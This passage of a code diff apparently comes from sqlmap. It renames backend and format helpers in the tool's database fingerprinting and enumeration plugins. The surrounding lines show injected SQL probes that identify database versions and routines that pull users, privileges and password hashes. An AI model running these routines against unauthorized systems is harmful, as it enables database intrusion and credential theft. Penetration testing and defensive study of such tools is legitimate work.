- backend.setVersionList([">= 5.1.2", "< 5.1.5"])
+ Backend.setVersionList([">= 5.1.2", "< 5.1.5"])
# Check if it is MySQL >= 5.0.0 and < 5.1.2
elif inject.checkBooleanExpression("@@hostname=@@hostname"):
- backend.setVersionList([">= 5.0.38", "< 5.1.2"])
+ Backend.setVersionList([">= 5.0.38", "< 5.1.2"])
elif inject.checkBooleanExpression("@@character_set_filesystem=@@character_set_filesystem"):
- backend.setVersionList([">= 5.0.19", "< 5.0.38"])
+ Backend.setVersionList([">= 5.0.19", "< 5.0.38"])
elif not inject.checkBooleanExpression("%s=(SELECT %s FROM DUAL WHERE %s!=%s)" % (randInt, randInt, randInt, randInt)):
- backend.setVersionList([">= 5.0.11", "< 5.0.19"])
+ Backend.setVersionList([">= 5.0.11", "< 5.0.19"])
elif inject.checkBooleanExpression("@@div_precision_increment=@@div_precision_increment"):
- backend.setVersionList([">= 5.0.6", "< 5.0.11"])
+ Backend.setVersionList([">= 5.0.6", "< 5.0.11"])
elif inject.checkBooleanExpression("@@automatic_sp_privileges=@@automatic_sp_privileges"):
- backend.setVersionList([">= 5.0.3", "< 5.0.6"])
+ Backend.setVersionList([">= 5.0.3", "< 5.0.6"])
else:
- backend.setVersionList([">= 5.0.0", "< 5.0.3"])
+ Backend.setVersionList([">= 5.0.0", "< 5.0.3"])
# For cases when information_schema is missing
elif inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()"):
- backend.setVersion(">= 5.0.2")
+ Backend.setVersion(">= 5.0.2")
setDbms("%s 5" % DBMS.MYSQL)
self.getBanner()
elif inject.checkBooleanExpression("STRCMP(LOWER(CURRENT_USER()), UPPER(CURRENT_USER()))=0"):
- backend.setVersion("< 5.0.0")
+ Backend.setVersion("< 5.0.0")
setDbms("%s 4" % DBMS.MYSQL)
self.getBanner()
@@ -247,20 +247,20 @@ class Fingerprint(GenericFingerprint):
# Check which version of MySQL < 5.0.0 it is
if inject.checkBooleanExpression("3=(SELECT COERCIBILITY(USER()))"):
- backend.setVersionList([">= 4.1.11", "< 5.0.0"])
+ Backend.setVersionList([">= 4.1.11", "< 5.0.0"])
elif inject.checkBooleanExpression("2=(SELECT COERCIBILITY(USER()))"):
- backend.setVersionList([">= 4.1.1", "< 4.1.11"])
+ Backend.setVersionList([">= 4.1.1", "< 4.1.11"])
elif inject.checkBooleanExpression("CURRENT_USER()=CURRENT_USER()"):
- backend.setVersionList([">= 4.0.6", "< 4.1.1"])
+ Backend.setVersionList([">= 4.0.6", "< 4.1.1"])
if inject.checkBooleanExpression("'utf8'=(SELECT CHARSET(CURRENT_USER()))"):
- backend.setVersion("= 4.1.0")
+ Backend.setVersion("= 4.1.0")
else:
- backend.setVersionList([">= 4.0.6", "< 4.1.0"])
+ Backend.setVersionList([">= 4.0.6", "< 4.1.0"])
else:
- backend.setVersionList([">= 4.0.0", "< 4.0.6"])
+ Backend.setVersionList([">= 4.0.0", "< 4.0.6"])
else:
- backend.setVersion("< 4.0.0")
+ Backend.setVersion("< 4.0.0")
setDbms("%s 3" % DBMS.MYSQL)
self.getBanner()
diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py
index 11384382a..ef109119f 100644
--- a/plugins/dbms/oracle/enumeration.py
+++ b/plugins/dbms/oracle/enumeration.py
@@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.core.agent import agent
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
@@ -30,7 +30,7 @@ class Enumeration(GenericEnumeration):
def getRoles(self, query2=False):
infoMsg = "fetching database users roles"
- rootQuery = queries[backend.getIdentifiedDbms()].roles
+ rootQuery = queries[Backend.getIdentifiedDbms()].roles
if conf.user == "CU":
infoMsg += " for current user"
@@ -179,7 +179,7 @@ class Enumeration(GenericEnumeration):
return []
def searchColumn(self):
- rootQuery = queries[backend.getIdentifiedDbms()].search_column
+ rootQuery = queries[Backend.getIdentifiedDbms()].search_column
foundCols = {}
dbs = { "USERS": {} }
colList = conf.col.split(",")
diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py
index 724453972..c5ca94a8b 100644
--- a/plugins/dbms/oracle/fingerprint.py
+++ b/plugins/dbms/oracle/fingerprint.py
@@ -10,8 +10,8 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
@@ -29,13 +29,13 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
@@ -46,16 +46,16 @@ class Fingerprint(GenericFingerprint):
value += DBMS.ORACLE
return value
- actVer = format.getDbms()
+ actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
- banVer = format.getDbms([banVer])
+ banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -63,7 +63,7 @@ class Fingerprint(GenericFingerprint):
return value
def checkDbms(self):
- if not conf.extensiveFp and (backend.isDbmsWithin(ORACLE_ALIASES) or conf.dbms in ORACLE_ALIASES):
+ if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or conf.dbms in ORACLE_ALIASES):
setDbms(DBMS.ORACLE)
self.getBanner()
@@ -112,7 +112,7 @@ class Fingerprint(GenericFingerprint):
output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION), 1, %d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2))
if output:
- backend.setVersion(version)
+ Backend.setVersion(version)
break
return True
diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py
index 5207ec85a..29d0af462 100644
--- a/plugins/dbms/postgresql/fingerprint.py
+++ b/plugins/dbms/postgresql/fingerprint.py
@@ -10,8 +10,8 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import getUnicode
from lib.core.common import randomInt
from lib.core.data import conf
@@ -32,13 +32,13 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
@@ -49,16 +49,16 @@ class Fingerprint(GenericFingerprint):
value += DBMS.PGSQL
return value
- actVer = format.getDbms()
+ actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
- banVer = format.getDbms([banVer])
+ banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -72,7 +72,7 @@ class Fingerprint(GenericFingerprint):
* http://www.postgresql.org/docs/8.4/interactive/release.html (up to 8.4.2)
"""
- if not conf.extensiveFp and (backend.isDbmsWithin(PGSQL_ALIASES) or conf.dbms in PGSQL_ALIASES):
+ if not conf.extensiveFp and (Backend.isDbmsWithin(PGSQL_ALIASES) or conf.dbms in PGSQL_ALIASES):
setDbms(DBMS.PGSQL)
self.getBanner()
@@ -108,35 +108,35 @@ class Fingerprint(GenericFingerprint):
logger.info(infoMsg)
if inject.checkBooleanExpression("2=(SELECT DIV(6, 3))"):
- backend.setVersion(">= 8.4.0")
+ Backend.setVersion(">= 8.4.0")
elif inject.checkBooleanExpression("EXTRACT(ISODOW FROM CURRENT_TIMESTAMP)<8"):
- backend.setVersionList([">= 8.3.0", "< 8.4"])
+ Backend.setVersionList([">= 8.3.0", "< 8.4"])
elif inject.checkBooleanExpression("ISFINITE(TRANSACTION_TIMESTAMP())"):
- backend.setVersionList([">= 8.2.0", "< 8.3.0"])
+ Backend.setVersionList([">= 8.2.0", "< 8.3.0"])
elif inject.checkBooleanExpression("9=(SELECT GREATEST(5, 9, 1))"):
- backend.setVersionList([">= 8.1.0", "< 8.2.0"])
+ Backend.setVersionList([">= 8.1.0", "< 8.2.0"])
elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35, 0.024, 10.06, 5))"):
- backend.setVersionList([">= 8.0.0", "< 8.1.0"])
+ Backend.setVersionList([">= 8.0.0", "< 8.1.0"])
elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'), 1, 1))"):
- backend.setVersionList([">= 7.4.0", "< 8.0.0"])
+ Backend.setVersionList([">= 7.4.0", "< 8.0.0"])
elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(), 1, 1))"):
- backend.setVersionList([">= 7.3.0", "< 7.4.0"])
+ Backend.setVersionList([">= 7.3.0", "< 7.4.0"])
elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"):
- backend.setVersionList([">= 7.2.0", "< 7.3.0"])
+ Backend.setVersionList([">= 7.2.0", "< 7.3.0"])
elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'), 2, 1))"):
- backend.setVersionList([">= 7.1.0", "< 7.2.0"])
+ Backend.setVersionList([">= 7.1.0", "< 7.2.0"])
elif inject.checkBooleanExpression("8=(SELECT POW(2, 3))"):
- backend.setVersionList([">= 7.0.0", "< 7.1.0"])
+ Backend.setVersionList([">= 7.0.0", "< 7.1.0"])
elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"):
- backend.setVersionList([">= 6.5.0", "< 6.5.3"])
+ Backend.setVersionList([">= 6.5.0", "< 6.5.3"])
elif inject.checkBooleanExpression("VERSION()=VERSION()"):
- backend.setVersionList([">= 6.4.0", "< 6.5.0"])
+ Backend.setVersionList([">= 6.4.0", "< 6.5.0"])
elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE, 1, 1))"):
- backend.setVersionList([">= 6.3.0", "< 6.4.0"])
+ Backend.setVersionList([">= 6.3.0", "< 6.4.0"])
elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap', 1, 1))"):
- backend.setVersionList([">= 6.2.0", "< 6.3.0"])
+ Backend.setVersionList([">= 6.2.0", "< 6.3.0"])
else:
- backend.setVersion("< 6.2.0")
+ Backend.setVersion("< 6.2.0")
return True
else:
diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py
index 25ee5416c..ab471bcd8 100644
--- a/plugins/dbms/sqlite/fingerprint.py
+++ b/plugins/dbms/sqlite/fingerprint.py
@@ -8,8 +8,8 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
@@ -28,13 +28,13 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
@@ -45,16 +45,16 @@ class Fingerprint(GenericFingerprint):
value += DBMS.SQLITE
return value
- actVer = format.getDbms()
+ actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"]
- banVer = format.getDbms([banVer])
+ banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -69,7 +69,7 @@ class Fingerprint(GenericFingerprint):
* http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions
"""
- if not conf.extensiveFp and (backend.isDbmsWithin(SQLITE_ALIASES) or conf.dbms in SQLITE_ALIASES):
+ if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or conf.dbms in SQLITE_ALIASES):
setDbms(DBMS.SQLITE)
self.getBanner()
@@ -98,7 +98,7 @@ class Fingerprint(GenericFingerprint):
result = inject.checkBooleanExpression("RANDOMBLOB(-1)>0")
version = '3' if result else '2'
- backend.setVersion(version)
+ Backend.setVersion(version)
setDbms(DBMS.SQLITE)
diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py
index ef1c585ed..adcea339a 100644
--- a/plugins/dbms/sybase/fingerprint.py
+++ b/plugins/dbms/sybase/fingerprint.py
@@ -8,8 +8,8 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.core.agent import agent
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import randomInt
from lib.core.data import conf
from lib.core.data import kb
@@ -28,13 +28,13 @@ class Fingerprint(GenericFingerprint):
def getFingerprint(self):
value = ""
- wsOsFp = format.getOs("web server", kb.headersFp)
+ wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
- dbmsOsFp = format.getOs("back-end DBMS", kb.bannerFp)
+ dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
@@ -45,16 +45,16 @@ class Fingerprint(GenericFingerprint):
value += DBMS.SYBASE
return value
- actVer = format.getDbms()
+ actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"]
- banVer = format.getDbms([banVer])
+ banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- htmlErrorFp = format.getErrorParsedDBMSes()
+ htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
@@ -62,10 +62,10 @@ class Fingerprint(GenericFingerprint):
return value
def checkDbms(self):
- if not conf.extensiveFp and (backend.isDbmsWithin(SYBASE_ALIASES) \
- or conf.dbms in SYBASE_ALIASES) and backend.getVersion() and \
- backend.getVersion().isdigit():
- setDbms("%s %s" % (DBMS.SYBASE, backend.getVersion()))
+ if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) \
+ or conf.dbms in SYBASE_ALIASES) and Backend.getVersion() and \
+ Backend.getVersion().isdigit():
+ setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion()))
self.getBanner()
@@ -107,7 +107,7 @@ class Fingerprint(GenericFingerprint):
result = inject.checkBooleanExpression("@@VERSION_NUMBER/1000=%d" % version)
if result:
- backend.setVersion(str(version))
+ Backend.setVersion(str(version))
break
return True
diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py
index 25c08447e..687acb98c 100644
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@@ -12,13 +12,13 @@ import time
from lib.core.agent import agent
from lib.core.common import arrayizeValue
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import dataToStdout
from lib.core.common import getRange
from lib.core.common import getCompiledRegex
from lib.core.common import getConsoleWidth
from lib.core.common import getFileItems
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getUnicode
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
@@ -86,7 +86,7 @@ class Enumeration:
infoMsg = "fetching banner"
logger.info(infoMsg)
- query = queries[backend.getIdentifiedDbms()].banner.query
+ query = queries[Backend.getIdentifiedDbms()].banner.query
kb.data.banner = inject.getValue(query)
bannerParser(kb.data.banner)
@@ -108,7 +108,7 @@ class Enumeration:
infoMsg = "fetching current user"
logger.info(infoMsg)
- query = queries[backend.getIdentifiedDbms()].current_user.query
+ query = queries[Backend.getIdentifiedDbms()].current_user.query
if not kb.data.currentUser:
kb.data.currentUser = inject.getValue(query)
@@ -119,7 +119,7 @@ class Enumeration:
infoMsg = "fetching current database"
logger.info(infoMsg)
- query = queries[backend.getIdentifiedDbms()].current_db.query
+ query = queries[Backend.getIdentifiedDbms()].current_db.query
if not kb.data.currentDb:
kb.data.currentDb = inject.getValue(query)
@@ -130,11 +130,11 @@ class Enumeration:
infoMsg = "testing if current user is DBA"
logger.info(infoMsg)
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
self.getCurrentUser()
- query = queries[backend.getIdentifiedDbms()].is_dba.query % kb.data.currentUser.split("@")[0]
+ query = queries[Backend.getIdentifiedDbms()].is_dba.query % kb.data.currentUser.split("@")[0]
else:
- query = queries[backend.getIdentifiedDbms()].is_dba.query
+ query = queries[Backend.getIdentifiedDbms()].is_dba.query
query = agent.forgeCaseStatement(query)
@@ -146,10 +146,10 @@ class Enumeration:
infoMsg = "fetching database users"
logger.info(infoMsg)
- rootQuery = queries[backend.getIdentifiedDbms()].users
+ rootQuery = queries[Backend.getIdentifiedDbms()].users
- condition = ( backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")) )
- condition |= ( backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema )
+ condition = ( Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")) )
+ condition |= ( Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema )
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
if condition:
@@ -175,14 +175,14 @@ class Enumeration:
errMsg = "unable to retrieve the number of database users"
raise sqlmapNoneDataException, errMsg
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
plusOne = True
else:
plusOne = False
indexRange = getRange(count, plusOne=plusOne)
for index in indexRange:
- if backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB):
+ if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB):
query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ")
elif condition:
query = rootQuery.blind.query2 % index
@@ -202,7 +202,7 @@ class Enumeration:
def getPasswordHashes(self):
infoMsg = "fetching database users password hashes"
- rootQuery = queries[backend.getIdentifiedDbms()].passwords
+ rootQuery = queries[Backend.getIdentifiedDbms()].passwords
if conf.user == "CU":
infoMsg += " for current user"
@@ -211,7 +211,7 @@ class Enumeration:
logger.info(infoMsg)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
- if backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")):
+ if Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.inband.query2
else:
query = rootQuery.inband.query
@@ -224,7 +224,7 @@ class Enumeration:
query += " WHERE "
query += " OR ".join("%s = '%s'" % (condition, user) for user in users)
else:
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
parsedUser = re.search("[\047]*(.*?)[\047]*\@", conf.user)
if parsedUser:
@@ -261,7 +261,7 @@ class Enumeration:
retrievedUsers = set()
for user in users:
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
parsedUser = re.search("[\047]*(.*?)[\047]*\@", user)
if parsedUser:
@@ -274,7 +274,7 @@ class Enumeration:
infoMsg += "for user '%s'" % user
logger.info(infoMsg)
- if backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")):
+ if Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.count2 % user
else:
query = rootQuery.blind.count % user
@@ -291,14 +291,14 @@ class Enumeration:
passwords = []
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
plusOne = True
else:
plusOne = False
indexRange = getRange(count, plusOne=plusOne)
for index in indexRange:
- if backend.getIdentifiedDbms() == DBMS.SYBASE:
+ if Backend.getIdentifiedDbms() == DBMS.SYBASE:
if index > 0:
warnMsg = "unable to retrieve other password "
warnMsg += "hashes for user '%s'" % user
@@ -307,15 +307,15 @@ class Enumeration:
else:
query = rootQuery.blind.query % user
getCurrentThreadData().disableStdOut = True
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
- if backend.isVersionWithin(("2005", "2008")):
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
+ if Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.query2 % (user, index, user)
else:
query = rootQuery.blind.query % (user, index, user)
else:
query = rootQuery.blind.query % (user, index)
password = inject.getValue(query, inband=False, error=False)
- if backend.getIdentifiedDbms() == DBMS.SYBASE:
+ if Backend.getIdentifiedDbms() == DBMS.SYBASE:
getCurrentThreadData().disableStdOut = False
password = "0x%s" % strToHex(password)
infoMsg = "retrieved: %s" % password
@@ -352,31 +352,31 @@ class Enumeration:
def __isAdminFromPrivileges(self, privileges):
# In PostgreSQL the usesuper privilege means that the
# user is DBA
- dbaCondition = ( backend.getIdentifiedDbms() == DBMS.PGSQL and "super" in privileges )
+ dbaCondition = ( Backend.getIdentifiedDbms() == DBMS.PGSQL and "super" in privileges )
# In Oracle the DBA privilege means that the
# user is DBA
- dbaCondition |= ( backend.getIdentifiedDbms() == DBMS.ORACLE and "DBA" in privileges )
+ dbaCondition |= ( Backend.getIdentifiedDbms() == DBMS.ORACLE and "DBA" in privileges )
# In MySQL >= 5.0 the SUPER privilege means
# that the user is DBA
- dbaCondition |= ( backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema and "SUPER" in privileges )
+ dbaCondition |= ( Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema and "SUPER" in privileges )
# In MySQL < 5.0 the super_priv privilege means
# that the user is DBA
- dbaCondition |= ( backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema and "super_priv" in privileges )
+ dbaCondition |= ( Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema and "super_priv" in privileges )
# In Firebird there is no specific privilege that means
# that the user is DBA
# TODO: confirm
- dbaCondition |= ( backend.getIdentifiedDbms() == DBMS.FIREBIRD and "SELECT" in privileges and "INSERT" in privileges and "UPDATE" in privileges and "DELETE" in privileges and "REFERENCES" in privileges and "EXECUTE" in privileges )
+ dbaCondition |= ( Backend.getIdentifiedDbms() == DBMS.FIREBIRD and "SELECT" in privileges and "INSERT" in privileges and "UPDATE" in privileges and "DELETE" in privileges and "REFERENCES" in privileges and "EXECUTE" in privileges )
return dbaCondition
def getPrivileges(self, query2=False):
infoMsg = "fetching database users privileges"
- rootQuery = queries[backend.getIdentifiedDbms()].privileges
+ rootQuery = queries[Backend.getIdentifiedDbms()].privileges
if conf.user == "CU":
infoMsg += " for current user"
@@ -432,10 +432,10 @@ class Enumeration:
}
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.inband.query2
condition = rootQuery.inband.condition2
- elif backend.getIdentifiedDbms() == DBMS.ORACLE and query2:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE and query2:
query = rootQuery.inband.query2
condition = rootQuery.inband.condition2
else:
@@ -447,7 +447,7 @@ class Enumeration:
query += " WHERE "
# NOTE: I assume that the user provided is not in
# MySQL >= 5.0 syntax 'user'@'host'
- if backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
queryUser = "%" + conf.user + "%"
query += " OR ".join("%s LIKE '%s'" % (condition, "%" + user + "%") for user in users)
else:
@@ -455,7 +455,7 @@ class Enumeration:
values = inject.getValue(query, blind=False)
- if not values and backend.getIdentifiedDbms() == DBMS.ORACLE and not query2:
+ if not values and Backend.getIdentifiedDbms() == DBMS.ORACLE and not query2:
infoMsg = "trying with table USER_SYS_PRIVS"
logger.info(infoMsg)
@@ -477,19 +477,19 @@ class Enumeration:
# In PostgreSQL we get 1 if the privilege is
# True, 0 otherwise
- if backend.getIdentifiedDbms() == DBMS.PGSQL and getUnicode(privilege).isdigit():
+ if Backend.getIdentifiedDbms() == DBMS.PGSQL and getUnicode(privilege).isdigit():
for position, pgsqlPriv in pgsqlPrivs:
if count == position and int(privilege) == 1:
privileges.add(pgsqlPriv)
# In MySQL >= 5.0 and Oracle we get the list
# of privileges as string
- elif backend.getIdentifiedDbms() == DBMS.ORACLE or ( backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema ):
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE or ( Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema ):
privileges.add(privilege)
# In MySQL < 5.0 we get Y if the privilege is
# True, N otherwise
- elif backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
for position, mysqlPriv in mysqlPrivs:
if count == position and privilege.upper() == "Y":
privileges.add(mysqlPriv)
@@ -506,7 +506,7 @@ class Enumeration:
conditionChar = "="
if conf.user:
- if backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
conditionChar = " LIKE "
if "," in conf.user:
@@ -533,7 +533,7 @@ class Enumeration:
for user in users:
unescapedUser = None
- if backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
unescapedUser = unescaper.unescape(user, quote=False)
if user in retrievedUsers:
@@ -548,18 +548,18 @@ class Enumeration:
else:
queryUser = user
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.blind.count2 % queryUser
- elif backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
query = rootQuery.blind.count % (conditionChar, queryUser)
- elif backend.getIdentifiedDbms() == DBMS.ORACLE and query2:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE and query2:
query = rootQuery.blind.count2 % queryUser
else:
query = rootQuery.blind.count % queryUser
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
if not isNumPosStrValue(count):
- if not (isinstance(count, basestring) and count.isdigit()) and backend.getIdentifiedDbms() == DBMS.ORACLE and not query2:
+ if not (isinstance(count, basestring) and count.isdigit()) and Backend.getIdentifiedDbms() == DBMS.ORACLE and not query2:
infoMsg = "trying with table USER_SYS_PRIVS"
logger.info(infoMsg)
@@ -575,20 +575,20 @@ class Enumeration:
privileges = set()
- if backend.getIdentifiedDbms() == DBMS.ORACLE:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE:
plusOne = True
else:
plusOne = False
indexRange = getRange(count, plusOne=plusOne)
for index in indexRange:
- if backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL and not kb.data.has_information_schema:
query = rootQuery.blind.query2 % (queryUser, index)
- elif backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL and kb.data.has_information_schema:
query = rootQuery.blind.query % (conditionChar, queryUser, index)
- elif backend.getIdentifiedDbms() == DBMS.ORACLE and query2:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE and query2:
query = rootQuery.blind.query2 % (queryUser, index)
